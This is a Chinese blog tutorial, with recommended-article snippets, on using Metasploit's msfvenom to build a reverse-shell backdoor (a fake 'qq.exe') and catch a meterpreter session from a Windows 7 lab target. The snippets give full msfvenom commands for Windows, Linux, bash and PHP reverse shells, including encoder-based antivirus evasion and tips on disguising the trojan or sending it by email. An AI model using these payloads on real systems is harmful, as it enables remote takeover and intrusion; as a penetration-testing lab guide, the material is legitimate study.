msf生成后门拿shell

最新推荐文章于 2025-04-12 15:59:39 发布
最新推荐文章于 2025-04-12 15:59:39 发布
阅读量447 收藏 3
点赞数
CC 4.0 BY-SA版权
文章标签: shell
原文链接:http://www.cnblogs.com/-zhong/p/10916483.html
本文介绍在Kali系统利用msfvenom反弹Windows靶机shell的方法。先尝试ping通靶机,接着在Kali终端输入msfvenom -l打开payload目录,生成后门文件移到靶机,打开msfconsole监听,运行后获取Session,可查看用户和系统信息,最后获取win7的shell,但权限较低需提权。

 

0X01简介 这里我本来想学习 msf利用漏洞反弹shell的 但是 没有靶机....等找了靶机在弄吧

kali 172.18.5.118

靶机  172.18.5.240

先尝试能不能ping通

好的可以 那我们进行下一步

0X01爱之初体验

先在kali终端输入msfvenom -l,打开payload目录

然后找到payload windows/meterpreter/reverse_tcp

输入以下命令生成后门qq.exe

 

 然后将生成的qq.exe移到靶机然后打开msfconsole

 使用该攻击模块监听 use exploit/multi/handler

然后设置payload

 

 

 在show options 发现还有未设置的

设置LHOSTkali地址

然后run开始监听

 

 

这时我们打开靶机qq.exe文件就能看到Kali这边获取到一个Session

输入jobs退出继续输入sessions -l查看session列表

这里有一个session列表,sessionid1

我们输入sessions -i 1,与该session交互

输入getuid查看用户信息

输入systinfo获取系统信息

输入shell即可获取win7shell

不过用这样方式拿的shell普遍都是很低的,还需提权

 

转载于:https://www.cnblogs.com/-zhong/p/10916483.html

Msfvenom制作自己的专属Shell
Liu_Bruce的博客
07-09 359
如何通过Msfvenom来生成用户自己的专属Shell?有时候我们上传Shell到目标主机后,不仅我们自己可以连接,其他用户也可以连接,有时候会导致我们丢失该Shell,甚至该shell被用户发现并查杀。
msf生成webshell_msf 之 webshell 提权
weixin_39623411的博客
12-22 474
首先建议一下到网上查查meterpreter的用法在看这篇文章,理解为什么要使用msf来提权(因为msf里边有个meterpreter很强大 ^_^)Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产...
使用MSF生成shellcode
weixin_34092455的博客
04-02 1148
使用MSF生成shellcode payload和shellcode的区别 Payload是是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码。因为Payload是包含在ShellCode中的,ShellCode是真正的被输入到存在漏洞的程序中的,并且ShellCode负责把程序的流程最终转移到你的Payload代码中。所以对于一个漏洞来说,ShellCode就...
MSF-Shellcode生成和使用
weixin_34301307的博客
11-12 4819
1使用环境 Kali 2.0 msfvenom 2Msfvenom参数说明 msfvenom –h 查看帮助 说明: Options: -p, --payload <payload>指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&...
MSF 生成shell命令
baidu_126894的博客
10-20 1789
MSF 生成在 Linux 下反弹的 Meterpreter Shell msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -f elf -a x86 --platform linux -o shell MSF 生成反弹 Shell (C Shellcode)...
MSF 生成静态免杀shell(win)
嘻嘻哈哈
01-26 2845
NO.1 利用工具 msf msf全称 MetasploitFramework,是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变的方便和简单。 vc++ c编译器 实现过程 1.使用msfvenom生成shellcode msfvenom -
msfvenom生成shell
向阳-Y.的博客
03-06 558
Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connec
MSF生成后门汇总
干铮的博客
10-10 4998
可执行脚本反弹shell 1.windows下exe执行文件后门 msfvenom -p windows/meterpreter/reverse_tcp LHOST=监听端ip地址 LPORT=监听端端口 x >文件路径/文件名 案例:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.193 LPORT=4444 x >/shell.exe 监听设置: msfconsole use exploit/mul...
渗透工具——kali中msf后门生成模块msfvenom)
2301_78006725的博客
09-02 1034
3. 通过邮件等方式上传到目标电脑,让目标电脑点击这个木马时,木马会在目标电脑后台运行(我这里就先用本机做一下试验)5. 然后run运行,同时点击桌面上的exe文件(不会出现画面,后进入后台运行)然后use exploit/multi/handler。成功拿到会话,就证明木马没问题,就可以进行操作啦!2. 点击文件管理,在root中查看是否已经生成完毕。show options完善信息。列出所有可用的payload;1. 生成shell
msf创建后门程序
m0_56135224的博客
05-21 416
msfvenom是用来生成后门的软件,可以实现在目标机上执行后门,在本地监听上线。(msfvenom在shell里使用,不是在mafconsole里使用)木马是我们最常说的病毒,分为两种,一是破坏型的,例如打开电脑就死机…二是控制型的,例如勒索病毒,远控木马…我们想实现远程控制别人电脑,但不是所有人电脑上都有漏洞,此时可以使用msfvenom生成远控木马。
MSF生成后门(制作各种shellcode攻击)
tmzy1的博客
03-09 1368
msfpayload,msfencode的结合体,可利用msfvenom生成后门(木马)程序,并在目标机上执行,在本地监听上线。进入msf命令:msconsole再执行msfvenom -h可得到命令帮助。
msf生成linux shellcode,使用MSF打造各种ShellCode
weixin_39866419的博客
05-13 1176
生成各种后门Windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exeLinux:msfvenom -a x86 --pla...
4.1 MSF 制作shellcode,且运行
qq_55202378的博客
08-25 5052
msf shellcode
MSFconsole进阶】Msfvenom后门生成模块:使用方法、shell生成、各种格式生成
05-24 2269
【渗透工具】MSFconsole进阶:Msfvenom(后门生成模块)
msfvenom-shll生成工具是msf 组件——Metasploit(MSF)使用详解
代码审计
04-22 2678
抽离 专职生成对应的payload异或编码 -e x86/shikata_ga_nai -i 3linux 生成 payloadphp 生成 payloadpython 生成 payloadwindows 生产payload 抽离 专职生成对应的payload 异或 编码 免杀 msfvenom -l platforms 支持平台 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.142 lport=55212 -f
利用msf生成后门shell
qq_36406396的博客
11-15 1万+
kali  x64:192.168.26.136 win7  x86: 192.168.26.128 先在kali终端输入msfvenom -l,打开payload目录 然后找到payload windows/meterpreter/reverse_tcp 输入以下命令生成后门qq.exe 然后将生成的qq.exe移到win7中,然后打开msf
利用msfvenom生成后门木马
qq_28147861的博客
01-18 2914
msfvenom工具介绍 msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。 用msfvenom生成一个PHP语言的PNG图片木马 代码:msfvenom -p php/meterpreter/reverse_tcp lh
msf后门生成
WZN56789的博客
04-12 258
将LHOST后的数字为刚刚查询出的kali的ip,LPORT为连接端口,">"后为后门保存路径。关闭目标机的杀软,将生成好的后门复制到目标机上,然后回到kali输入。打开kali中的shell,输入。查看kali的内网ip。
msf-Msfvenonm生成后门木马
热门推荐
weixin_45588247的博客
08-27 2万+
msf-Msfvenonm生成后门木马实验 文章目录msf-Msfvenonm生成后门木马实验一、工具:二、实验环境:三、`msfvenom`简介:四、各平台生成木马的方法:五、生成反向反弹木马:1. windows平台:1.1 生成反弹木马:1.2 捆绑一个程序伪装木马:2. :3. :4. :1.1 :2.1 :五、实验过程:1. :1.1 :1.1.1 : 一、工具: Metasploit Framework(MSF)漏洞利用框架 二、实验环境: 靶   机: windows10虚拟机:192.
使用msf生成反弹shell
最新发布
05-29
### 使用 Metasploit 框架生成反弹 Shell 的 Payload Metasploit 是一个强大的渗透测试框架,提供了多种模块和工具用于生成后门以及模拟安全攻击。以下详细介绍了如何使用 `msfvenom` 工具生成反弹 Shell 的 Payload。 #### 生成 Windows 系统的反弹 Shell Payload 对于 Windows 系统,可以生成一个带有 Meterpreter 会话的可执行文件(`.exe`)。以下是生成命令的示例: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP地址 LPORT=目标端口 -f exe -o shell.exe ``` 这条命令的作用是生成一个基于 `windows/meterpreter/reverse_tcp` 的 Payload,其中 `-p` 指定 Payload 类型,`LHOST` 是本地监听的 IP 地址,`LPORT` 是本地监听的端口号,`-f exe` 表示输出格式为可执行文件,`-o shell.exe` 指定输出文件名[^3]。 #### 生成 Linux 系统的反弹 Shell Payload 对于 Linux 系统,可以生成一个基于 Bash 或 Python 的 Payload。以下是生成 Bash 脚本的示例: ```bash msfvenom -p cmd/unix/reverse_bash LHOST=你的IP地址 LPORT=目标端口 -f raw -o shell.sh ``` 此命令生成了一个基于 `cmd/unix/reverse_bash` 的 Payload,适用于 Unix/Linux 系统。输出格式为原始数据流(`raw`),并保存为脚本文件 `shell.sh`[^4]。 #### 配置 Metasploit Framework 监听器 生成 Payload 后,需要在 Metasploit 中配置监听器以接收反弹连接。以下是配置监听器的步骤: 1. 启动 Metasploit Console。 2. 使用以下命令加载相应的 Exploit 模块: ```bash use exploit/multi/handler ``` 3. 设置 Payload 类型与生成时一致: ```bash set payload windows/meterpreter/reverse_tcp ``` 4. 设置监听 IP 和端口: ```bash set lhost 你的IP地址 set lport 目标端口 ``` 5. 开始监听: ```bash exploit ``` 当目标系统运行生成的 Payload 时,Metasploit 将捕获反弹连接并提供交互Shell。 #### 注意事项 在进行渗透测试或学习时,必须确保拥有合法授权。未经授权的使用可能违反法律。此外,生成的 Payload 可能会被防病毒软件检测到,因此需要考虑 Payload 的混淆或编码技术以提高成功率[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值